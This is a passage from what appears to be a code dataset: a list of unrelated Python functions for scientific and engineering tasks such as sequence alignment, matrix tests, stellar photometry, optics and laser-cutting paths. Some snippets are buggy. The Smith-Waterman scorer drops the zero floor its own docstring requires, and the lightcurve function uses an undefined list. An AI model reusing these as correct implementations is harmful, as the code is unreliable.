{\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def smith_waterman_fill(self):\r\n\r\n matrix = self.empty_matrix() # Building on the previous definition\r\n\r\n def score_cell(i,j):\r\n \"\"\"\r\n This scoreing definition will return the score of\r\n a position (i, j) based on the left, upper, and upper left values.\r\n Your scoring function should:\r\n * Choose the maximum of the following 4 values for the score\r\n * the value of (i-1, j) + insertion/deletion penalty\r\n * the value of (i, j-1) + insertion/deletion penalty\r\n * If the characters at i-1 and j-1 in s1 and s2 respectively match:\r\n the value of (i-1, j-1) + match score\r\n else\r\n the value of (i-1, j-1) + mismatch penalty\r\n * 0 (if all other numbers are negative, use 0)\r\n :param i: integer, the outer list index\r\n :param j: integer, the inner list index\r\n :return: integer\r\n \"\"\"\r\n match = 3\r\n mismatch = -3\r\n ins_del = -2\r\n \r\n up = matrix[i-1][j]+ ins_del\r\n left = matrix[i][j-1]+ ins_del\r\n \r\n if self.s1[i-1] == self.s2[j-1]:\r\n diag = matrix[i-1][j-1] + match\r\n else:\r\n diag = matrix[i-1][j-1] + mismatch\r\n \r\n return max(up, left, diag)\r\n \r\n for i in range(1,len(self.s1)+1):\r\n for j in range(1,len(self.s2)+1):\r\n matrix[i][j] =score_cell(i,j)\r\n \r\n return matrix", "def test_banded_to_full():\n A_diag = np.diag([11, 22, 33, 44, 55])\n A_diag_band = np.array([[11, 22, 33, 44, 55]])\n A = banded_to_full(A_diag_band, 5, 0, 0, 'g')\n assert norm(A - A_diag) == 0\n A = banded_to_full(A_diag_band, 5, 0, 0, 't')\n assert norm(A - A_diag) == 0\n A = 
banded_to_full(A_diag_band, 5, 0, 0, 'h')\n assert norm(A - A_diag) == 0\n A = banded_to_full(A_diag_band, 5, 0, 0, 's')\n assert norm(A - A_diag) == 0\n\n A_gen = np.array(\n [\n [11, 12, 13, 0, 0],\n [21, 22, 23, 24, 0],\n [0, 32, 33, 34, 35],\n [0, 0, 43, 44, 45],\n [0, 0, 0, 54, 55],\n ]\n )\n A_gen_band = np.array(\n [\n [0, 0, 13, 24, 35],\n [0, 12, 23, 34, 45],\n [11, 22, 33, 44, 55],\n [21, 32, 43, 54, 0],\n ]\n )\n A = banded_to_full(A_gen_band, 5, kl=1, ku=2, mode='g')\n assert norm(A - A_gen) == 0\n\n A_sym = np.array(\n [\n [11, 12, 13, 0, 0],\n [12, 22, 23, 24, 0],\n [13, 23, 33, 34, 35],\n [0, 24, 34, 44, 45],\n [0, 0, 35, 45, 55],\n ]\n )\n A_sym_band_u = np.array(\n [[0, 0, 13, 24, 35], [0, 12, 23, 34, 45], [11, 22, 33, 44, 55]]\n )\n A_sym_band_l = np.array(\n [[11, 22, 33, 44, 55], [12, 23, 34, 45, 0], [13, 24, 35, 0, 0]]\n )\n A = banded_to_full(A_sym_band_u, 5, kl=0, ku=2, mode='s')\n assert norm(A - A_sym) == 0\n A = banded_to_full(A_sym_band_l, 5, kl=2, ku=0, mode='s')\n assert norm(A - A_sym) == 0\n\n A_herm = np.array(\n [\n [11, 12j, 13j, 0, 0],\n [-12j, 22, 23j, 24j, 0],\n [-13j, -23j, 33, 34j, 35j],\n [0, -24j, -34j, 44, 45j],\n [0, 0, -35j, -45j, 55],\n ]\n )\n A_herm_band_u = np.array(\n [[0, 0, 13j, 24j, 35j], [0, 12j, 23j, 34j, 45j], [11, 22, 33, 44, 55]]\n )\n A_herm_band_l = np.array(\n [\n [11, 22, 33, 44, 55],\n [-12j, -23j, -34j, -45j, 0],\n [-13j, -24j, -35j, 0, 0],\n ]\n )\n A = banded_to_full(A_herm_band_u, 5, kl=0, ku=2, mode='h')\n assert norm(A - A_herm) < 1e-14\n A = banded_to_full(A_herm_band_l, 5, kl=2, ku=0, mode='h')\n assert norm(A - A_herm) < 1e-14\n\n A_triu = np.array(\n [\n [11, 12, 13, 0, 0],\n [0, 22, 23, 24, 0],\n [0, 0, 33, 34, 35],\n [0, 0, 0, 44, 45],\n [0, 0, 0, 0, 55],\n ]\n )\n A_triu_band = A_sym_band_u\n A = banded_to_full(A_triu_band, 5, kl=0, ku=2, mode='t')\n assert norm(A - A_triu) == 0\n A = banded_to_full(A_triu_band, 5, kl=0, ku=2, mode='g')\n assert norm(A - A_triu) == 0\n\n A_tril = np.array(\n [\n [11, 0, 0, 0, 0],\n [12, 22, 0, 0, 0],\n [13, 23, 33, 0, 0],\n [0, 24, 34, 44, 0],\n [0, 0, 35, 45, 55],\n ]\n )\n A_tril_band = A_sym_band_l\n A = banded_to_full(A_tril_band, 5, kl=2, ku=0, mode='t')\n assert norm(A - A_tril) == 0\n A = banded_to_full(A_tril_band, 5, kl=2, ku=0, mode='g')\n assert norm(A - A_tril) == 0", "def expand_slicer_aperture(system):\n\n # First of all, we need to find the Surface Number for the IMAGE SLICER\n N_surfaces = system.LDE.NumberOfSurfaces\n surface_names = {} # A dictionary of surface number -> surface comment\n for k in np.arange(1, N_surfaces):\n surface_names[k] = system.LDE.GetSurfaceAt(k).Comment\n # find the Slicer surface number\n try:\n # The naming convention for this surface has changed. 
Not the same for Nominal Design as Monte Carlos\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('Slicer Mirror')]\n except ValueError:\n slicer_num = list(surface_names.keys())[list(surface_names.values()).index('IFU ISA')]\n slicer = system.LDE.GetSurfaceAt(slicer_num)\n\n # Read Current Aperture Settings\n apt_type = slicer.ApertureData.CurrentType\n # print(\"Aperture type: \", apt_type)\n if apt_type == 4: # 4 is Rectangular aperture\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # print(\"Current Settings:\")\n x0 = current_apt_sett._S_RectangularAperture.XHalfWidth\n y0 = current_apt_sett._S_RectangularAperture.YHalfWidth\n # If the Y aperture hasn't been changed already, we change it here to 999 mm to get all rays through\n if y0 != 999:\n # Change Settings\n aperture_settings = slicer.ApertureData.CreateApertureTypeSettings(\n constants.SurfaceApertureTypes_RectangularAperture)\n aperture_settings._S_RectangularAperture.XHalfWidth = x0\n aperture_settings._S_RectangularAperture.YHalfWidth = 999\n slicer.ApertureData.ChangeApertureTypeSettings(aperture_settings)\n\n current_apt_sett = slicer.ApertureData.CurrentTypeSettings\n # Notify that we have successfully modified the aperture\n print(\"Changing aperture of surface: \", slicer.Comment)\n print(\"New Settings:\")\n print(\"X_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.XHalfWidth)\n print(\"Y_HalfWidth = %.2f\" % current_apt_sett._S_RectangularAperture.YHalfWidth)\n\n return", "def reshape(self, bottom, top):\n\t\tpass", "def make_lightcurve(centroids, bands, band_idx, box_size, aperture_radius):\n band_names = np.sort(list(bands.keys()))\n num_stars= range(len(centroids))\n for star_idx in num_stars:\n xcenters, ycenters = [],[]\n aperture_sums = []\n background = []\n fwhms = []\n obs_time = []\n obs_mjd = []\n ##extract lightcurve (enumerate all frames) in a given band\n for i in tqdm(bands[band_names[band_idx]]):\n #import pdb; pdb.set_trace()\n hdr = fits.open(i)[0].header\n img = fits.open(i)[0].data\n #get dates from fits header\n date=dt.strptime(hdr['DATE-OBS'], '%Y-%m-%d')\n time=dt.strptime(hdr['EXP-STRT'], '%H:%M:%S.%f')\n newdate = time.replace(year=date.year, month=date.month, day=date.day)\n obs_time.append(newdate)\n obs_mjd.append(hdr['MJD-STRT'])\n\n #crop\n #import pdb; pdb.set_trace()\n image_crop = get_crop(img, centroids[star_idx], box_size)\n\n ###aperture photometry###\n #compute centroid\n centroid = get_centroid(image_crop)\n\n xcenters.append(centroid[0])\n ycenters.append(centroid[1])\n\n #compute backgound\n bkg_mean=get_bkg(image_crop, centroid, r_in=20., r_out=30.)\n\n #measure fwhm\n fwhm=get_fwhm(image_crop)\n\n #without aperture photometry\n\n aperture_sum = get_phot(image_crop, centroid, r=aperture_radius)\n\n #minus background wihtin annulus\n #aperture_sum = get_phot2(image_crop,bkg_mean,centroid,r=aperture_radius)\n\n aperture_sums.append(aperture_sum)\n background.append(bkg_mean)\n\n # if fwhm < 10*np.median(fwhms):\n # fwhms.append(fwhm)\n # else:\n # fwhms.append(np.nan)\n fwhms.append(fwhm)\n\n #output as dataframe of given band and star\n\n dfs.append(pd.DataFrame(\n {'{0}_{1}_x'.format(band_names[band_idx], str(star_idx)) : xcenters,\n '{0}_{1}_y'.format(band_names[band_idx], str(star_idx)) : ycenters,\n '{0}_{1}_flux_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : aperture_sums,\n '{0}_{1}_bkg_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : background,\n 
'{0}_{1}_fwhm_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : fwhms},\n #'airmass' : airmass\n index = obs_time))\n return dfs, band_idx, band_names", "def calculate_stretch(t, period, transit_times):\r\n\r\n duration_timeseries = (numpy.max(t) - numpy.min(t)) / period\r\n epochs = len(transit_times)\r\n stretch = duration_timeseries / epochs\r\n return stretch", "def oss_stacked(block, cut, laser):\r\n\tx0_1, x1_1, z0_1, taper_x_1, taper_y_1, layers_1, pyramid_angle_1 = oss_helper(block, cut, laser, cut[\"final_dimension_x\"]/2)\r\n\tx0_2, x1_2, z0_2, taper_x_2, taper_y_2, layers_2, pyramid_angle_2 = oss_helper(block, cut, laser, cut[\"final_dimension_y\"]/2)\r\n\tangle = math.radians(laser[\"kerf_angle\"]/2)\r\n\tgap = math.tan(pyramid_angle_1) * (cut[\"final_dimension_x\"]/2) + cut[\"gap_size\"]\r\n\tunit_length = gap + cut[\"base_height\"]\r\n\tmax_slices = math.floor(block[\"thickness\"]/unit_length)\r\n\ttaper_straight = math.tan(angle)*(laser[\"z_spacing\"])\r\n\r\n\tif cut[\"core\"] == \"yes\":\r\n\t\tcutlist = json.loads(vertical_core(block,cut,laser))\r\n\t\tcutlist.pop()\r\n\t\tcutlist.pop(0)\r\n\telse:\r\n\t\tcutlist = []\r\n\r\n\ta0 = -(90 + math.degrees(angle))\r\n\r\n\tz_shift = (cut[\"base_height\"] + gap) * math.sin(angle)\r\n\tx_shift = (cut[\"base_height\"] + gap) * math.cos(angle)\r\n\r\n\tx_delta = math.sin(angle) * block[\"origin_x\"]\r\n\ty_delta = math.sin(angle) * block[\"origin_y\"]\r\n\tz1_delta = math.cos(angle) * block[\"origin_x\"]\r\n\tz2_delta = math.cos(angle) * block[\"origin_y\"]\r\n\r\n\tcutlist.append([\"a_abs\",f\"{a0:.6f}\"])\r\n\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\r\n\r\n\tif pyramid_angle_1 >= angle and pyramid_angle_2 >= angle:\r\n\r\n\t\tif cut[\"num_of_seeds\"] == \"max\":\r\n\t\t\tnum_slices = max_slices\r\n\t\telse:\r\n\t\t\tnum_slices = cut[\"num_of_seeds\"] + 1\r\n\t\t\r\n\t\tfor i in range(num_slices):\r\n\t\t\tcutlist = (cutlist\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x0_1 + y_delta,-cut[\"final_dimension_y\"]/2 - block[\"origin_x\"],x1_1 + y_delta,z0_1 + block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 + z1_delta)]] + [[\"c_abs\",\"90\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x0_2 + x_delta,-cut[\"final_dimension_x\"]/2 + block[\"origin_y\"],x1_2 + x_delta,z0_2 + block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_1 - z2_delta)]] + [[\"c_abs\",\"180\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x0_1 - y_delta,-cut[\"final_dimension_y\"]/2 + block[\"origin_x\"],x1_1 - y_delta,z0_1 - block[\"origin_y\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_1,taper_y_1,taper_straight,layers_1)\r\n\t\t\t\t\t\t + [[\"z_abs\",str(z0_2 - z1_delta)]] + [[\"c_abs\",\"270\"]]\r\n\t\t\t\t\t\t + pyramid_slice(cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x0_2 - x_delta,-cut[\"final_dimension_x\"]/2 - block[\"origin_y\"],x1_2 - x_delta,z0_2 - block[\"origin_x\"],laser[\"xy_spacing\"], laser[\"z_spacing\"], taper_x_2,taper_y_2,taper_straight,layers_2)\r\n\t\t\t\t\t\t )\r\n\t\t\tz0_1 = z0_1 + z_shift\r\n\t\t\tz0_2 = z0_2 + z_shift\r\n\t\t\tx0_1, x1_1, x0_2, x1_2 = x0_1 - x_shift, x1_1 - x_shift, x0_2 - x_shift, x1_2 - 
x_shift\r\n\t\t\tcutlist.append([\"c_abs\",str(block[\"physical_rotation\"])])\r\n\t\t\tcutlist.append([\"z_abs\",str(z0_1 + z2_delta)])\t\r\n\telse:\r\n\t\traise Exception(\"Pyramid angle too small\")\r\n\r\n\tcutlist.insert(0, [\"set_trigger4\", \"1\", \"0\", \"7\", \"8\", \"45\"])\r\n\tcutlist.append([\"stop_trigger\"])\r\n\treturn json.dumps(cutlist)", "def terrain_multiplier(self):\n #Hardcode table of terrain multipliers\n self.terrain_table = pd.DataFrame({\n 'height': [0.00, 3.00, 5.00, 10.0, 15.0, 20.0, 30.0, 40.0, 50.0, 75.0, 100., 150., 200.],\n '1': [0.99, 0.99, 1.05, 1.12, 1.16, 1.19, 1.22, 1.24, 1.25, 1.27, 1.29, 1.31, 1.32],\n '2': [0.91, 0.91, 0.91, 1.00, 1.05, 1.08, 1.12, 1.16, 1.18, 1.22, 1.24, 1.27, 1.29],\n '3': [0.83, 0.83, 0.83, 0.83, 0.89, 0.94, 1.00, 1.04, 1.07, 1.12, 1.16, 1.21, 1.24],\n '4': [0.75, 0.75, 0.75, 0.75, 0.75, 0.75, 0.80, 0.85, 0.90, 0.98, 1.03, 1.11, 1.16]}) #T4.1 AS1170.2\n self.terrain_table.set_index('height',inplace=True)\n\n terrain_stacked = self.terrain_table.stack().reset_index().values\n\n #2d interpolation of Table 4.1 AS1170.2.\n #Terrain Categories may be halves (e.g Category 1.5)\n #Heights may be any value\n #https://stackoverflow.com/questions/56291133/interpolation-of-a-pandas-dataframe\n self.M_z_cat = griddata(terrain_stacked[:,0:2],\n terrain_stacked[:,2],\n [(self.height, self.terrain_category)],\n method='linear')[0]", "def gen_rhombus(width):\n for row in range(1, width +1, 2):\n yield f\"{(STAR * row).center(width)}\"\n\n for row in range(width -2, 0, -2):\n yield f\"{(STAR * row).center(width)}\"", "def arm(self):\n pass", "def recon_steer_bands(pyr, freq_resps, numlevels, numorientations):\n \n result_bands = np.zeros(pyr[0].shape)\n\n freq_hi = np.fft.fftshift(np.fft.fft2(pyr[0]))\n result_hi = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_hi, np.conjugate(freq_resps[0])))).real \n \n freq_lo = np.fft.fftshift(np.fft.fft2(pyr[2]))\n result_lo = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_lo, np.conjugate(freq_resps[2])))).real\n \n freq_resp_band = freq_resps[1]\n pyr_band = pyr[1] \n for i in range(numlevels):\n for j in range(numorientations): \n freq_band = np.fft.fftshift(np.fft.fft2(pyr_band[i][j]))\n result_band = np.fft.ifft2(np.fft.fftshift(np.multiply(freq_band, np.conjugate(freq_resp_band[i][j])))).real\n result_bands = result_bands + result_band \n result = result_bands + result_hi + result_lo\n return result", "def logistic(scale, shift, stretch, t):\r\n return scale / (1 + np.power(np.e, -1.0*(t - shift )/ stretch))", "def tridiag_matrix(bc_surface_type, upsilon, space_divisions, dx, k, T, h, hc, emissivity, sigma):\n # create tri-diagonal matrix\n A = np.diagflat([-upsilon for i in range(space_divisions - 1)], -1) +\\\n np.diagflat([1 + 2 * upsilon for i in range(space_divisions)]) +\\\n np.diagflat([-upsilon for i in range(space_divisions - 1)], 1)\n\n # adjust matrix depending on the boundary condition at the exposed surface\n if bc_surface_type == \"linear\":\n A[0,0] = 1 + 2*upsilon + 2*upsilon*dx*h/k\n A[0,1] = -2*upsilon\n \n elif bc_surface_type == \"non-linear\":\n A[0,0] = 1 + 2*upsilon + 2*dx*hc*upsilon/k+ 8*emissivity*sigma*dx*upsilon*T[0]**3/k\n A[0,1] = -2*upsilon\n \n # adjust matrix for the back boundary conditions\n A[-1, -2] = - 2 * upsilon\n A[-1, -1] = 1 + 2 * upsilon\n\n return A", "def prepare_r_uls_r_lus(\n number_of_levels,\n number_of_shells,\n j_blues,\n excitation_species,\n nlte_data,\n ):\n # number_of_levels = atomic_data_levels.energy.loc[\n # excitation_species\n # ].count() do 
this in the solver\n lnl = nlte_data.lines_level_number_lower[excitation_species]\n lnu = nlte_data.lines_level_number_upper[excitation_species]\n (lines_index,) = nlte_data.lines_idx[excitation_species]\n\n try:\n j_blues_filtered = j_blues.iloc[lines_index]\n except AttributeError:\n j_blues_filtered = j_blues\n A_uls = nlte_data.A_uls[excitation_species]\n B_uls = nlte_data.B_uls[excitation_species]\n B_lus = nlte_data.B_lus[excitation_species]\n r_lu_index = lnu * number_of_levels + lnl\n r_ul_index = lnl * number_of_levels + lnu\n r_ul_matrix = np.zeros(\n (number_of_levels, number_of_levels, number_of_shells),\n dtype=np.float64,\n )\n r_ul_matrix_reshaped = r_ul_matrix.reshape(\n (number_of_levels**2, number_of_shells)\n )\n r_ul_matrix_reshaped[r_ul_index] = (\n A_uls[np.newaxis].T + B_uls[np.newaxis].T * j_blues_filtered\n )\n r_lu_matrix = np.zeros_like(r_ul_matrix)\n r_lu_matrix_reshaped = r_lu_matrix.reshape(\n (number_of_levels**2, number_of_shells)\n )\n r_lu_matrix_reshaped[r_lu_index] = (\n B_lus[np.newaxis].T * j_blues_filtered\n )\n return (\n lines_index,\n r_ul_index,\n r_ul_matrix,\n r_lu_index,\n r_lu_matrix,\n )\n # TODO: beta sobolev needs to be recalculated for each iteration, because it depends on number density", "def swipeBase (self) :\n grid = self.grid\n\n #we start by putting every tile up\n for columnNbr in range(4) :\n nbrZeros = 4 - np.count_nonzero(grid[:,columnNbr])\n\n for lineNbr in range(4) :\n counter = 0\n while (grid[lineNbr, columnNbr] == 0) and (counter < 4):\n counter += 1\n if np.count_nonzero(grid[lineNbr:4, columnNbr]) != 0 :\n for remainingLine in range (lineNbr, 3) :\n grid[remainingLine, columnNbr] = grid[remainingLine+1, columnNbr]\n grid[3, columnNbr] = 0\n\n #now we do the additions\n for lineNbr in range(3) :\n if grid[lineNbr, columnNbr] == grid[lineNbr+1, columnNbr] :\n grid[lineNbr, columnNbr] *= 2\n for remainingLine in range (lineNbr+1, 3) :\n grid[remainingLine, columnNbr] = grid[remainingLine+1, columnNbr]\n grid[3, columnNbr] = 0\n\n return (grid)", "def defineSigmaLevels():\r\n # A and B values for the definition of sigma levelist\r\n # Since there are 72 model levels, there are 73 half levels, so it is for A and B values\r\n # the unit of A is hPa!!!!!!!!!!!!\r\n # from surface to TOA\r\n A = np.array([\r\n 0.000000e+00, 4.804826e-02, 6.593752e+00, 1.313480e+01, 1.961311e+01, 2.609201e+01,\r\n 3.257081e+01, 3.898201e+01, 4.533901e+01, 5.169611e+01, 5.805321e+01, 6.436264e+01,\r\n 7.062198e+01, 7.883422e+01, 8.909992e+01, 9.936521e+01, 1.091817e+02, 1.189586e+02,\r\n 1.286959e+02, 1.429100e+02, 1.562600e+02, 1.696090e+02, 1.816190e+02, 1.930970e+02,\r\n 2.032590e+02, 2.121500e+02, 2.187760e+02, 2.238980e+02, 2.243630e+02, 2.168650e+02,\r\n 2.011920e+02, 1.769300e+02, 1.503930e+02, 1.278370e+02, 1.086630e+02, 9.236572e+01,\r\n 7.851231e+01, 6.660341e+01, 5.638791e+01, 4.764391e+01, 4.017541e+01, 3.381001e+01,\r\n 2.836781e+01, 2.373041e+01, 1.979160e+01, 1.645710e+01, 1.364340e+01, 1.127690e+01,\r\n 9.292942e+00, 7.619842e+00, 6.216801e+00, 5.046801e+00, 4.076571e+00, 3.276431e+00,\r\n 2.620211e+00, 2.084970e+00, 1.650790e+00, 1.300510e+00, 1.019440e+00, 7.951341e-01,\r\n 6.167791e-01, 4.758061e-01, 3.650411e-01, 2.785261e-01, 2.113490e-01, 1.594950e-01,\r\n 1.197030e-01, 8.934502e-02, 6.600001e-02, 4.758501e-02, 3.270000e-02, 2.000000e-02,\r\n 1.000000e-02,],dtype=float)\r\n # reverse A\r\n A = A[::-1] * 100 # change unit to Pa\r\n # the unit of B is 1!!!!!!!!!!!!\r\n # from surfac eto TOA\r\n B = np.array([\r\n 1.000000e+00, 
9.849520e-01, 9.634060e-01, 9.418650e-01, 9.203870e-01, 8.989080e-01,\r\n 8.774290e-01, 8.560180e-01, 8.346609e-01, 8.133039e-01, 7.919469e-01, 7.706375e-01,\r\n 7.493782e-01, 7.211660e-01, 6.858999e-01, 6.506349e-01, 6.158184e-01, 5.810415e-01,\r\n 5.463042e-01, 4.945902e-01, 4.437402e-01, 3.928911e-01, 3.433811e-01, 2.944031e-01,\r\n 2.467411e-01, 2.003501e-01, 1.562241e-01, 1.136021e-01, 6.372006e-02, 2.801004e-02,\r\n 6.960025e-03, 8.175413e-09, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00, 0.000000e+00,\r\n 0.000000e+00,],dtype=float)\r\n # reverse B\r\n B = B[::-1]\r\n\r\n return (A, B)", "def expanded_boundaries(self):\n width = self._points[0][3][0] - self._points[0][1][0]\n height = self._points[0][3][1] - self._points[0][1][1]\n factor = np.multiply((width, height), Window.BORDER)\n return (\n np.subtract(self._points[0][1], factor),\n np.add(self._points[0][3], factor))", "def setup_layout_constants(self):\n # determines the spacing between the edge and nmos (rail to active\n # metal or poly_to_poly spacing)\n half_gate_to_gate = 0.5 * (drc[\"poly_to_poly\"] - drc[\"minwidth_metal1\"])\n edge_to_nmos = max(drc[\"metal1_to_metal1\"] - self.nmos.active_contact_positions[0].y,\n half_gate_to_gate - self.nmos.poly_positions[0].y)\n\n # determine the position of the first transistor from the left\n self.nmos_position1 = vector(0,\n 0.5 * drc[\"minwidth_metal1\"] + edge_to_nmos)\n offset = self.nmos_position1 + vector(0,self.nmos.height)\n\n x = vector(self.nmos.active_width - self.nmos.active_contact.width, 0)\n self.nmos_position2 = x + self.nmos_position1.scale(0,1)\n\n # determines the spacing between the edge and pmos\n edge_to_pmos = max(drc[\"metal1_to_metal1\"] - self.pmos.active_contact_positions[0].y,\n half_gate_to_gate - self.pmos.poly_positions[0].y)\n self.pmos_position1 = vector(0,\n self.height - 0.5 * drc[\"minwidth_metal1\"]\n - edge_to_pmos - self.pmos.height)\n self.pmos_position2 = self.pmos_position1 + vector(self.pmos.width,0)\n\n self.well_width = max(self.pmos_position2.x + self.pmos.active_position.x\n + self.pmos.active_width\n + drc[\"active_to_body_active\"] + self.nwell_contact.width \n + drc[\"well_enclosure_active\"],\n self.nmos_position2.x + self.nmos.active_position.x \n + self.nmos.active_width \n + drc[\"active_to_body_active\"] + drc[\"well_enclosure_active\"])\n self.width = self.well_width", "def warm_region_cal(audio_samples, fs):\n #window the audio\n windowed_samples = timbral_util.window_audio(audio_samples)\n\n # need to define a function for the roughness stimuli, emphasising the 20 - 40 region (of the bark scale)\n min_bark_band = 10\n max_bark_band = 40\n mean_bark_band = (min_bark_band + max_bark_band) / 2.0\n array = np.arange(min_bark_band, max_bark_band)\n x = timbral_util.normal_dist(array, theta=0.01, mean=mean_bark_band)\n x -= np.min(x)\n x /= np.max(x)\n\n wr_array = np.zeros(240)\n wr_array[min_bark_band:max_bark_band] = x\n\n # need to define a second array emphasising the 20 - 40 region (of the bark scale)\n 
min_bark_band = 80\n max_bark_band = 240\n mean_bark_band = (min_bark_band + max_bark_band) / 2.0\n array = np.arange(min_bark_band, max_bark_band)\n x = timbral_util.normal_dist(array, theta=0.01, mean=mean_bark_band)\n x -= np.min(x)\n x /= np.max(x)\n\n hf_array = np.zeros(240)\n hf_array[min_bark_band:max_bark_band] = x\n\n windowed_loud_spec = []\n windowed_rms = []\n\n wr_vals = []\n hf_vals = []\n\n for i in range(windowed_samples.shape[0]):\n samples = windowed_samples[i, :]\n N_entire, N_single = timbral_util.specific_loudness(samples, Pref=100.0, fs=fs, Mod=0)\n\n # append the loudness spec\n windowed_loud_spec.append(N_single)\n windowed_rms.append(np.sqrt(np.mean(samples * samples)))\n\n wr_vals.append(np.sum(wr_array * N_single))\n hf_vals.append(np.sum(hf_array * N_single))\n\n mean_wr = np.mean(wr_vals)\n mean_hf = np.mean(hf_vals)\n weighted_wr = np.average(wr_vals, weights=windowed_rms)\n weighted_hf = np.average(hf_vals, weights=windowed_rms)\n\n return mean_wr, weighted_wr, mean_hf, weighted_hf", "def stretch(self, x_stretch=1, y_stretch=1):\n self.width *= x_stretch\n self.height *= y_stretch\n\n # Always update the corners after operation\n self.update_corners()\n return", "def boundary_cond_dirichtlet(matriz,Tx1,Tx2,Ty1,Ty2):\n matriz[-1,:] = Tx2\n matriz[:,0] = Ty1\n matriz[:,-1] = Ty2\n matriz[0,:] = Tx1\n return matriz", "def post_heatdiag(self,ds):\n #\n self.drmid=self.rmid*0 # mem allocation\n self.drmid[1:-1]=(self.rmid[2:]-self.rmid[0:-2])*0.5\n self.drmid[0]=self.drmid[1]\n self.drmid[-1]=self.drmid[-2]\n\n dt = np.zeros_like(self.time)\n dt[1:] = self.time[1:] - self.time[0:-1]\n dt[0] = dt[1]\n rst=np.nonzero(dt<0) #index when restat happen\n dt[rst]=dt[rst[0]+1]\n self.dt = dt\n\n #get separatrix r\n self.rs=np.interp([1],self.psin,self.rmid)\n \n self.rmidsepmm=(self.rmid-self.rs)*1E3 # dist from sep in mm\n\n #get heat\n self.qe=np.transpose(self.e_perp_energy_psi + self.e_para_energy_psi)/dt/ds\n self.qi=np.transpose(self.i_perp_energy_psi + self.i_para_energy_psi)/dt/ds\n self.ge=np.transpose(self.e_number_psi)/dt/ds\n self.gi=np.transpose(self.i_number_psi)/dt/ds\n\n self.qe = np.transpose(self.qe)\n self.qi = np.transpose(self.qi)\n self.ge = np.transpose(self.ge)\n self.gi = np.transpose(self.gi)\n\n self.qt=self.qe+self.qi\n #imx=self.qt.argmax(axis=1)\n mx=np.amax(self.qt,axis=1)\n self.lq_int=mx*0 #mem allocation\n\n for i in range(mx.shape[0]):\n self.lq_int[i]=np.sum(self.qt[i,:]*self.drmid)/mx[i]", "def flattener(image, pts, w, h):\n temp_rect = np.zeros((4,2), dtype = \"float32\")\n \n s = np.sum(pts, axis = 2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis = -1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n if w > 0.8 * h and w < 1.2 * h: #If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest 
right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n \n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [MAXWIDTH - 1, 0], [MAXWIDTH - 1, MAXHEIGHT - 1], [0, MAXHEIGHT - 1]], np.float32)\n M = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, M, (MAXWIDTH, MAXHEIGHT))\n\n return warp", "def build_steer_bands(im, freq_resps, numlevels, numorientations):\n \n dims = im.shape\n bands = []\n pyr = []\n fourier = np.fft.fftshift(np.fft.fft2(im))\n \n freq_resp_hi = freq_resps[0] \n hi = np.fft.ifft2(np.fft.fftshift(np.multiply(fourier, 